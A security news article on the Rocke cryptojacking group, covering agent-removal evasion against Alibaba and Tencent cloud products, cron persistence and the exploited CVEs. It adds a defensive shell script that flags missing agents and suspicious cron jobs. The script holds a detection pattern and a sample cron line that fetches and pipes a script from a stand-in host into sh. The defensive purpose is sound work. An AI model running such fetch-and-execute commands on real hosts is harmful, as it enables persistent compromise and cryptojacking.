Analysis of new malware samples used by the Rocke group for cryptojacking reveals code that uninstalls multiple cloud security and monitoring products developed by Tencent Cloud and Alibaba Cloud from compromised Linux servers.
Rocke's goal is to compromise Linux machines and use them to mine Monero cryptocurrency. The group gets in by exploiting several vulnerabilities in Apache Struts 2, Oracle WebLogic and Adobe ColdFusion.
Analyzing the new malware strains used by Rocke, researchers from Palo Alto Networks' Unit 42 team found that the malware first gains full administrative control of the machine and then uses that position to run a routine that uninstalls local agents that could sound the alarm about malicious activity.
The targets are local agents added by Tencent Host Security (HS, also known as YunJing) and the Threat Detection Service (TDS, also known as Aegis) from Alibaba Cloud.
The two products offer features such as malware detection and removal, vulnerability management, log analysis, big-data threat analysis, asset management, and alerts on password-cracking attempts.
Rocke’s cryptojacking malware can get rid of the following products:
Alibaba Threat Detection Service agent.
Alibaba CloudMonitor agent (Monitor CPU & memory consumption, network connectivity).
Alibaba Cloud Assistant agent (Tool for automatically managing instances).
Tencent Host Security agent.
Tencent Cloud Monitor agent.
The threat actor is not new in the cybercriminal landscape. It was first reported to the public by Cisco Talos, in August 2018. However, researchers were familiar with Rocke’s activity prior to this date, from campaigns as early as April 2018.
The gang is tied to the Iron cybercrime group, believed to be the maker of the Linux cryptojacking malware Rocke uses and of Xbash, a piece of malware that deletes databases on Linux and mines cryptocurrency on Windows.
One of the vulnerabilities the group exploits is CVE-2017-10271, a remote code execution flaw in Oracle WebLogic. After compromising a machine, Rocke's malware achieves persistence via cron jobs and kills any competing cryptomining processes already present on the host.
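Both behaviours described above, the removal of the cloud agents and the cron-based persistence, leave traces that can be checked for from the host. The following POSIX shell script is an added example written for this page; it is not code from the article or from Unit 42. The agent process names it looks for are assumed placeholders, not names the report gives, and the sample process list and crontab are constructed test data.

```shell
#!/bin/sh
# Added example (not from the article or Unit 42): host check for the two
# behaviours described above. It reports (1) cloud security/monitoring agents
# that are no longer running and (2) cron entries that fetch and pipe remote
# scripts into a shell, a common cryptojacking persistence pattern.
#
# ASSUMPTION: the process names below are illustrative placeholders for the
# Alibaba and Tencent agents; replace them with the names your deployment runs.
EXPECTED_AGENTS="AliYunDun argusagent aliyun-service YDService sgagent"

# missing_agents EXPECTED PROCS
#   EXPECTED: space-separated process names that should be running
#   PROCS:    process list, one command name per line (e.g. output of `ps -eo comm=`)
#   Prints the expected names not found in PROCS, space-separated.
missing_agents() {
  expected=$1
  procs=$2
  missing=""
  for name in $expected; do
    # -x: whole-line match, -F: literal string, so "sgagent" does not match "sgagentd"
    if ! printf '%s\n' "$procs" | grep -qxF -- "$name"; then
      missing="$missing $name"
    fi
  done
  printf '%s' "${missing# }"
}

# suspicious_cron CRONTEXT
#   Prints crontab lines that download with curl/wget and pipe into sh/bash,
#   or decode base64 and pipe into a shell. Comment lines are ignored.
suspicious_cron() {
  printf '%s\n' "$1" \
    | grep -v '^[[:space:]]*#' \
    | grep -E '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)[^|]*[|][[:space:]]*(ba)?sh' \
    || true
}

# live_check: run both checks against the current host.
# Reads the system crontab, /etc/cron.d and every user crontab readable to us.
live_check() {
  procs=$(ps -eo comm= 2>/dev/null)
  cron=$(cat /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/* /var/spool/cron/* 2>/dev/null)
  printf 'Missing agents: %s\n' "$(missing_agents "$EXPECTED_AGENTS" "$procs")"
  printf 'Suspicious cron lines:\n%s\n' "$(suspicious_cron "$cron")"
}

# Constructed sample data: a host on which the Tencent agents have been
# uninstalled and a cron job pulls a script from an attacker host every 10 min.
SAMPLE_PROCS="systemd
sshd
AliYunDun
argusagent
aliyun-service
kworker/0:1"

SAMPLE_CRON="# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew
*/10 * * * * curl -fsSL http://example.invalid/x.sh | sh"

printf 'Missing agents: %s\n' "$(missing_agents "$EXPECTED_AGENTS" "$SAMPLE_PROCS")"
printf 'Suspicious cron lines:\n%s\n' "$(suspicious_cron "$SAMPLE_CRON")"
```

On the sample data the script reports `YDService` and `sgagent` as missing and flags only the `curl ... | sh` cron line. Call `live_check` to run the same checks on a real host. One caveat follows directly from the article: the malware runs with full administrative control, so it can stop or edit an on-box check just as easily as it uninstalls the agents. The robust signal is the one the attacker cannot suppress from inside the machine, namely the agent going silent as seen from the cloud provider's console or from a central collector that expects a heartbeat.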
Palo Alto Networks Unit 42 says it has been working with Tencent Cloud and Alibaba Cloud to address the agent-removal evasion and the malware's C2 infrastructure, and that the malicious C2 domains are also flagged by its PAN-DB URL Filtering service.
Public cloud infrastructure is one of the main targets for this cybercrime group. Knowing that existing cloud monitoring and security products may detect an intrusion, the malware authors continue to develop new evasion techniques to avoid detection by cloud security products.